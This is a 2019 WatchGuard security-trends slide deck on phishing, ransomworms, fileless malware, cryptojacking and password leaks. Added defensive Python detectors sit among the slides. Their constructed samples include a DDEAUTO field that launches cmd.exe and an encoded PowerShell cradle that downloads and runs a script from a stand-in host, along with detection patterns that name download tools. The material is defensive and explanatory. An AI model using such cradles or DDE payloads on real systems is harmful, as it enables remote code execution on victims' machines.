1/15/2019
Copyright ©2016 WatchGuard Technologies, Inc. All Rights Reserved
2019 Security Trends & Predictions
Defending Against Future Cyber Attacks
Corey Nachreiner, CISSP, CTO
Agenda
Threat Landscape Statistics
– General attack statistics
– WatchGuard’s Internet Security Report
2018 Top Cyber Threats
– Five cyber threats to watch out for
2019 Predictions
Defense Summary
Threat Landscape by the Numbers
Endless Data Breaches (2018 H1)
Breach Costs Rise Slightly
2018 Cost of Data Breach Study
• Avg. cost per breach: $3.86M
• Avg. cost per record: $148
• Cost increase: 6.2%
• Record cost increase: 4.7%
Companies Slow to Detect and Contain
* Ponemon’s 2018 Cost of a Data Breach Report
WatchGuard’s Quarterly Internet Security Reports
Q2 2018 Malware Trends
New Dynamic ISR Threat Landscape Page
1. Dynamic date ranges
2. Filter by region or country
3. Filter by malware / network attacks
4. More features coming…
– Map with attack source
– Filter by city
– Top malware domains/URLs
– Etc…
https://www.secplicity.org/threat-landscape/
Top Cyber Threats
5 Threats to Beware of in 2018
1. Spear phishing
2. Ransomworms
3. Fileless malware
4. Crypto hacking
5. Password leaks
Flavors of Phishing
Phishing – luring a victim into giving up credentials or doing something via a legitimate-seeming email
Spear-phishing – a more customized phishing email that targets a specific individual or group
Whaling – spear-phishing that targets C-level executives
Old phishing example:
• Not individualized
• Bulk recipients
• Uses real assets
• Malicious document
Spear-phishing example:
• Personalized to me
• Fits my job role
• Understands business relationships
• Sender makes sense in context
• Malicious attachment fits context
Users Still Click Phishing Emails
Prevention: DNS Blocking & Awareness Training
• Focus on phishing training
• DNSWatch filtering
What is a RansomWORM?
Ransomware is a form of malware that encrypts your files and demands you pay a ransom.
A worm is a type of malware that spreads automatically over your network.
A ransomworm is extremely nasty ransomware that spreads to many computers in your network.
WannaCry: Ransomworm Spreads Globally
Emerged Friday, May 12th, 2017
Started in Europe
– NHS, UK (40+ locations)
– Telefonica, Spain
– Deutsche Bahn
– FedEx, US
Strong encryption (2048-bit RSA)
Leaked NSA exploit (EternalBlue, against MS17-010)
~400,000 global victims
~$300-600 ransom (bitcoin)
Mostly Windows 7
Estimated $4 billion in losses
Many copycat variants have emerged
WannaCry Still Spreading as of Mar. 2018
New Ransomware Hobbles City
Prevention: Advanced Malware Detection
OS Virtualization:
• Virtualizes a full victim system
• Runs unknown content in a protected environment
• Analyzes behaviors
• Detects sandbox evasion
• Tracks additional malware and C&Cs
What is Fileless Malware?
A fileless infection, or fileless malware, is a threat that ONLY loads malicious code in memory, rather than installing it on the victim's hard drive.
Fileless malware:
• Is harder for traditional AV to catch
• Tends to inject into normal processes on your computer
• Often leverages PowerShell and scripts
Typically arrives in two ways:
1. Exploits a software vulnerability on your computer
2. Arrives as a document (a file) that runs a script
Fileless Malware Growing
77% of attacks that successfully compromised organizations in 2017 utilized fileless techniques – Ponemon Institute*
Fileless malware attacks accounted for 52% of all attacks in 2017 – Carbon Black
* Ponemon Institute's "The 2017 State of Endpoint Security Risk Report"
Word DDE Attacks (ISR Example)
Macro-less Word malware abuses Microsoft's Dynamic Data Exchange (DDE) feature to execute code on a victim computer.
Example: (screenshot of a DDE field in the original deck)
DDE Attacks Increase Q4 2017
Example of code in one Word doc (screenshot in the original deck): downloads obfuscated code, shown alongside its decoded form.
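The field-code technique on these slides can be checked for mechanically: a .docx is a zip archive, and field instructions live either in `w:instrText` runs of a complex field or in the `w:instr` attribute of a `w:fldSimple` element. The scanner below is an added example, not code from the deck or from WatchGuard. It joins the instruction runs of each field before matching, because the keyword is often split across runs (`DDE` + `AUTO`) to defeat naive string searches. The two documents it inspects are constructed in memory with a harmless `calc.exe` payload; `scan_docx`, `build_docx`, `SAMPLE_DDE` and `SAMPLE_BENIGN` are names belonging to this example.

```python
"""Scan .docx files for DDE / DDEAUTO field codes (added example; constructed samples)."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS
# A field instruction that starts with DDE or DDEAUTO. Word ignores case and
# leading whitespace/quotes, so the pattern does too.
DDE_RE = re.compile(r'^[\s"]*DDE(AUTO)?\b', re.IGNORECASE)


def field_instructions(xml_bytes):
    """Collect every field instruction in one WordprocessingML part.

    Complex fields are spread over runs: fldChar(begin), instrText*, fldChar(end).
    The instrText pieces are joined so 'DDE' and 'AUTO' in separate runs are
    still seen as a single keyword.
    """
    fields = []
    for para in ET.fromstring(xml_bytes).iter(W + "p"):
        current = None
        for el in para.iter():  # document order within the paragraph
            if el.tag == W + "fldSimple":
                fields.append(el.get(W + "instr", ""))
            elif el.tag == W + "fldChar":
                kind = el.get(W + "fldCharType")
                if kind == "begin":
                    current = []
                elif kind == "end" and current is not None:
                    fields.append("".join(current))
                    current = None
            elif el.tag == W + "instrText" and current is not None:
                current.append(el.text or "")
        if current:  # unterminated field: still report what was collected
            fields.append("".join(current))
    return fields


def scan_docx(data):
    """Return [(zip member, field instruction)] for every DDE field in the package."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            # document.xml, headers, footers and footnotes can all carry fields
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            try:
                fields = field_instructions(z.read(name))
            except ET.ParseError:
                continue
            hits.extend((name, f.strip()) for f in fields if DDE_RE.match(f))
    return hits


def build_docx(body_xml):
    """Constructed minimal .docx: only word/document.xml, enough for the scanner."""
    doc = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
           '<w:document xmlns:w="%s"><w:body>%s</w:body></w:document>' % (W_NS, body_xml))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", doc)
    return buf.getvalue()


# Constructed sample: keyword split across two runs, harmless calc.exe payload
# (the same shape as public DDE demonstrations; not a real malicious document).
SAMPLE_DDE = build_docx(
    '<w:p>'
    '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>'
    '<w:r><w:instrText xml:space="preserve">AUTO c:\\\\windows\\\\system32\\\\cmd.exe '
    '"/k calc.exe" </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
    '<w:r><w:t>Error! Unknown field.</w:t></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
    '</w:p>')

# Constructed benign sample: an ordinary DATE field written as a simple field.
SAMPLE_BENIGN = build_docx(
    '<w:p><w:fldSimple w:instr=" DATE \\@ &quot;d MMMM yyyy&quot; ">'
    '<w:r><w:t>15 January 2019</w:t></w:r></w:fldSimple></w:p>')

if __name__ == "__main__":
    for label, blob in (("dde", SAMPLE_DDE), ("benign", SAMPLE_BENIGN)):
        print(label, scan_docx(blob))
```

Run it against a mail-gateway quarantine or a file share and review every hit by hand: DDE has legitimate uses (linking spreadsheets), so the scanner reports, and a human decides.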
Prevention: Detection & Response
• ThreatSync TI (threat intelligence) identifies known malicious processes
• Dynamic process heuristics find suspicious processes
• HRP (Host Ransomware Prevention) behavior detection could help too
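To make "process heuristics" concrete, here is an added example (not ThreatSync or TDR code) that scores Sysmon-style process-creation events, constructed here as JSON lines, for the tradecraft on the preceding slides: an Office application spawning a shell (what a DDE field does), an -EncodedCommand payload decoded from its UTF-16LE base64, download-and-execute cradles, and hidden-window or bypass options. The weights, the threshold, the event records and the `example.invalid` stager URL are this example's own assumptions.

```python
"""Triage process-creation events for fileless / PowerShell tradecraft (added example)."""
import base64
import json
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
          "cscript.exe", "regsvr32.exe", "rundll32.exe"}
# Download-and-execute cradles, matched in the raw and the decoded command line.
CRADLES = [re.compile(p, re.I) for p in (
    r"downloadstring", r"downloadfile", r"invoke-webrequest", r"net\.webclient",
    r"invoke-expression", r"\biex\b", r"frombase64string", r"bitsadmin",
    r"certutil.*-urlcache")]
# (weight, option pattern). Hidden window and bypass are weak alone, because admin
# scripts use them too, so they only add to a score instead of alerting by themselves.
OPTION_FLAGS = [
    (2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    (1, re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I)),
    (1, re.compile(r"-nop(?:rofile)?\b", re.I)),
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload (base64 of UTF-16LE text), or None.
    PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...)."""
    toks = cmdline.split()
    for i in range(len(toks) - 1):
        t = toks[i].lower()
        if t == "-ec" or (len(t) >= 2 and "-encodedcommand".startswith(t)):
            blob = toks[i + 1]
            if len(blob) >= 16 and re.fullmatch(r"[A-Za-z0-9+/=]+", blob):
                try:
                    return base64.b64decode(blob, validate=True).decode("utf-16le", "replace")
                except ValueError:  # binascii.Error is a ValueError
                    return None
    return None


def score_event(ev):
    """Score one event; the reasons list is what an analyst sees in the alert."""
    parent = basename(ev.get("ParentImage", ""))
    image = basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    score, reasons = 0, []
    if parent in OFFICE_APPS and image in SHELLS:
        score += 5
        reasons.append("%s spawned %s" % (parent, image))
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        score += 3
        reasons.append("encoded command")
    text = cmd + "\n" + (decoded or "")
    for pat in CRADLES:
        if pat.search(text):
            score += 4
            reasons.append("download/execute cradle (%s)" % pat.pattern)
            break
    for weight, pat in OPTION_FLAGS:
        if pat.search(cmd):
            score += weight
            reasons.append("option %s" % pat.pattern)
    return {"parent": parent, "image": image, "score": score,
            "reasons": reasons, "decoded": decoded}


def triage(lines, threshold=3):
    """Parse JSON-lines events and return those scoring at or above the threshold."""
    alerts = []
    for line in lines:
        try:
            ev = json.loads(line)
        except ValueError:
            continue
        result = score_event(ev)
        if result["score"] >= threshold:
            alerts.append(result)
    return alerts


# Constructed sample: the stager a DDE field or macro would hand to PowerShell.
_STAGER = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage2.ps1")'
_ENC = base64.b64encode(_STAGER.encode("utf-16le")).decode("ascii")
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [json.dumps(e) for e in (
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": r"powershell.exe -NoProfile Get-ChildItem C:\Temp"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -w hidden -nop -ec " + _ENC},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": _PS,
     "CommandLine": "powershell -w hidden -nop -ec " + _ENC},
    {"ParentImage": r"C:\Windows\System32\services.exe", "Image": _PS,
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
)]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["score"], alert["image"], alert["reasons"])
```

The interactive `Get-ChildItem` and the scheduled backup script stay under the threshold; the Word-spawned shell and the encoded download cradle do not. Parent/child pairing is the cheapest and most durable of these signals, since a DDE or macro payload cannot choose its parent process.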
Cryptocurrencies Rocket in Value
Cyber Criminals Target Anything with Value
How cyber criminals use cryptocurrency:
1. As an "anonymous" ransom currency
2. Target online cryptocurrency wallets
3. Find and steal cryptocurrency directly from victim computers
4. Cryptojacking
Cryptojacking is hijacking a victim's compute resources to mine cryptocurrency without the victim's knowledge. It arrives either as a hidden script on web sites or as a malware payload.
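Whether it arrives as a web script or a malware payload, a miner has to talk to its pool, and it does so with Stratum, a JSON-RPC dialect, so a captured stream can be classified by message shape rather than by the miner's domain or file hash. The detector below is an added example, not WatchGuard's code; the two sessions it classifies are constructed JSON-RPC lines. The method and key names are those of Bitcoin-style Stratum (`mining.*`) and the CryptoNote variant spoken by browser and XMRig-style miners (`login`, `getjob`, `submit`, jobs carrying `blob`/`job_id`/`target`).

```python
"""Flag Stratum mining-protocol sessions in captured JSON-RPC streams (added example)."""
import json

STRATUM_METHODS = {"mining.subscribe", "mining.authorize", "mining.notify",
                   "mining.set_difficulty", "mining.submit",
                   "login", "getjob", "submit", "keepalived"}
JOB_KEYS = {"blob", "job_id", "target"}      # a CryptoNote job assignment
SUBMIT_KEYS = {"job_id", "nonce", "result"}  # a share submission


def indicators(msg):
    """Return the Stratum indicators present in one decoded JSON-RPC message."""
    found = []
    if not isinstance(msg, dict):
        return found
    method = msg.get("method")
    if method in STRATUM_METHODS:
        found.append("method:" + method)
    params = msg.get("params")
    if isinstance(params, dict) and SUBMIT_KEYS <= set(params):
        found.append("share submission (job_id/nonce/result)")
    result = msg.get("result")
    if isinstance(result, dict):
        job = result.get("job", result)  # job may be nested in a login reply
        if isinstance(job, dict) and JOB_KEYS <= set(job):
            found.append("job assignment (blob/job_id/target)")
    return found


def classify_stream(lines, min_indicators=2):
    """Return (is_mining, evidence) for a newline-delimited stream.

    Two independent indicators are required so that an unrelated JSON-RPC API
    that merely has a 'login' method is not flagged.
    """
    evidence = []
    for raw in lines:
        try:
            msg = json.loads(raw)
        except ValueError:
            continue  # not JSON (HTTP, binary, ...): ignore
        evidence.extend(indicators(msg))
    return len(evidence) >= min_indicators, evidence


# Constructed sample: a CryptoNote-style miner session over WebSocket/TCP.
MINER_SESSION = [
    '{"id":1,"jsonrpc":"2.0","method":"login",'
    '"params":{"login":"wallet","pass":"x","agent":"miner/1.0"}}',
    '{"id":1,"jsonrpc":"2.0","result":{"id":"s1",'
    '"job":{"blob":"0707...","job_id":"j1","target":"b88d0600"},"status":"OK"}}',
    '{"id":2,"jsonrpc":"2.0","method":"submit",'
    '"params":{"id":"s1","job_id":"j1","nonce":"a1b2c3d4","result":"00ff..."}}',
]
# Constructed sample: an unrelated JSON-RPC API that happens to have a login call.
API_SESSION = [
    '{"id":1,"jsonrpc":"2.0","method":"login","params":{"user":"bob","password":"hunter2"}}',
    '{"id":1,"jsonrpc":"2.0","result":"session-token-123"}',
    'GET /healthz HTTP/1.1',
]

if __name__ == "__main__":
    print("miner:", classify_stream(MINER_SESSION))
    print("api:  ", classify_stream(API_SESSION))
```

On a proxy or IDS this runs over reassembled WebSocket text frames as well as raw TCP, which matters for the web-script case: browser miners usually reach the pool through a WebSocket proxy on 443, so port and domain alone say little.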
Protection: Intelligent AV
By monitoring tens of millions of benign and malicious files using machine learning and artificial intelligence, WatchGuard can predictively identify zero-day malware.
Identities Are on the Loose…
WatchGuard ISR: .GOV & .MIL Analysis
• Leaked .gov passwords = 380,077
• Leaked .mil passwords = 503,878
Do government and military organizations use password security best practices?
Combined, only 0.07% of these addresses used one of the 50 most common passwords.
Most, however, didn't use sufficiently long passwords.
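The two numbers on this slide (share of addresses using a top-common password, share using a short one) can be reproduced on any credential dump you are entitled to hold, such as your own domain's entries from a breach feed. The script below is an added example, not the ISR's analysis code. The dump, the common-password list and the 12-character minimum are constructed assumptions (the slide does not state its length threshold), and it adds one check the slide does not mention: passwords built from the address's own local part or domain, which attackers try first.

```python
"""Audit a leaked-credential list the way the .gov/.mil analysis did (added example)."""
from collections import Counter

# Constructed stand-in for a "top 50 most common passwords" list.
COMMON_PASSWORDS = {
    "123456", "password", "123456789", "12345678", "12345", "111111", "1234567",
    "sunshine", "qwerty", "iloveyou", "princess", "admin", "welcome", "666666",
    "abc123", "football", "123123", "monkey", "654321", "charlie", "password1",
    "qwerty123", "letmein", "dragon", "baseball",
}

# Constructed sample dump in the usual "email:password" form; no real accounts.
SAMPLE_DUMP = """\
bob@mail.mil:password1
alice@state.gov:Correct-Horse-Battery-9
carol@navy.mil:navy2016
dave@army.mil:123456
erin@nasa.gov:Tr0ub4dor&3
frank@ftc.gov:frank1234
grace@af.mil:Summer2018!
heidi@doe.gov:9p$Lm2#qVx7Rz!bW
"""


def parse_dump(text):
    """Split 'email:password' lines; only the first colon separates the fields,
    because a password may itself contain colons."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        email, password = line.split(":", 1)
        records.append((email.lower(), password))
    return records


def identity_words(email):
    """Words derived from the address: local part and domain labels (not the TLD)."""
    local, _, domain = email.partition("@")
    words = [local] + domain.split(".")[:-1]
    return {w for w in words if len(w) >= 3}


def audit(records, common=COMMON_PASSWORDS, min_length=12):
    """Count passwords that are common, shorter than min_length, or identity-derived."""
    counts = Counter()
    for email, pw in records:
        counts["total"] += 1
        if pw.lower() in common:
            counts["common"] += 1
        if len(pw) < min_length:
            counts["short"] += 1
        if any(w in pw.lower() for w in identity_words(email)):
            counts["identity"] += 1
    total = counts["total"]

    def pct(n):
        return round(100.0 * n / total, 2) if total else 0.0

    return {"total": total, "common": counts["common"], "short": counts["short"],
            "identity": counts["identity"], "pct_common": pct(counts["common"]),
            "pct_short": pct(counts["short"]), "pct_identity": pct(counts["identity"])}


if __name__ == "__main__":
    for key, value in audit(parse_dump(SAMPLE_DUMP)).items():
        print("%-13s %s" % (key, value))
```

`pct_common` is the slide's 0.07%-style figure; `pct_short` is the one the slide says was the real problem. Against a live directory the same checks are run over password hashes with a cracking tool rather than over plaintext, but the policy questions are identical.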
SMBs Really Need MFA
Breaches that leveraged either stolen and/or weak passwords (two pie charts in the original deck):
• 2015: 61% (39% did not)
• 2016: 81% (19% did not)
Source: Verizon Data Breach Investigations Report
Prevention: MFA Secures Authentication
Easy multi-factor authentication (MFA) for:
• Employee PC and network login
• Remote access
• Privileged user access
• Access to cloud services (SaaS)
2019 Security Predictions
2019 Security Predictions Intro
Prediction #1: AI-Driven Chatbots Go Rogue
Prediction #2: Ransomware Targets ICS
Prediction #3: UN Cyber Security Treaty
Prediction #4: "Fire Sale" from Fiction to Reality
Targets: finance, communications, utilities & ICS
Die Hard 4 depicted a "fire sale", which is a three-stage coordinated attack on a country's transportation, telecommunications, financial, and utilities infrastructure systems.
Prediction #5: Vaporworms Proliferate (Fileless Worms)
Prediction #6: Wi-Fi Hacks Still Affect WPA3
Prediction #7: 1FA Biometrics Get Hacked
Defense Summary
Cyber Kill Chain 3.0
1. RECONNAISSANCE: The attacker gathers information on the victim
2. DELIVERY: The attack payload is delivered through the network perimeter
3. COMPROMISE/EXPLOIT: Vulnerabilities from the reconnaissance stage are exploited to launch an attack
4. INFECTION/INSTALLATION: The attack payload is installed on the system and persistence is obtained
5. COMMAND AND CONTROL: The attack payload calls home for instructions
6. LATERAL MOVEMENT/PIVOTING: The attacker moves behind the network perimeter to their final target
7. OBJECTIVES/EXFILTRATION: The goal of the attack is accomplished
WatchGuard Breaks the KillChain
(Diagram in the original deck: each of the seven kill chain stages above is mapped to the services that counter it; the per-stage layout did not survive extraction.) Services shown: Packet Filtering, Proxies, IPS, APT Blocker, Gateway AntiVirus, DLP, Application Control, Reputation Enabled Defense, WebBlocker, TDR, Botnet Protection.
Summary of Defenses
UTM Layered Defense
• No single security service prevents all threats. UTM combines many services to offer Kill Chain defenses.
APT Blocker
• Ransomware is evasive and fast changing. You need behavioral malware detection to catch the latest variants.
Threat Detection and Response
• As a last defense, TDR's Host Ransomware Prevention can stop some ransomware from encrypting files on an endpoint.
AuthPoint MFA
• No single factor of authentication is perfect. Passwords can leak, tokens can be stolen, and biometrics can be copied.
Thank You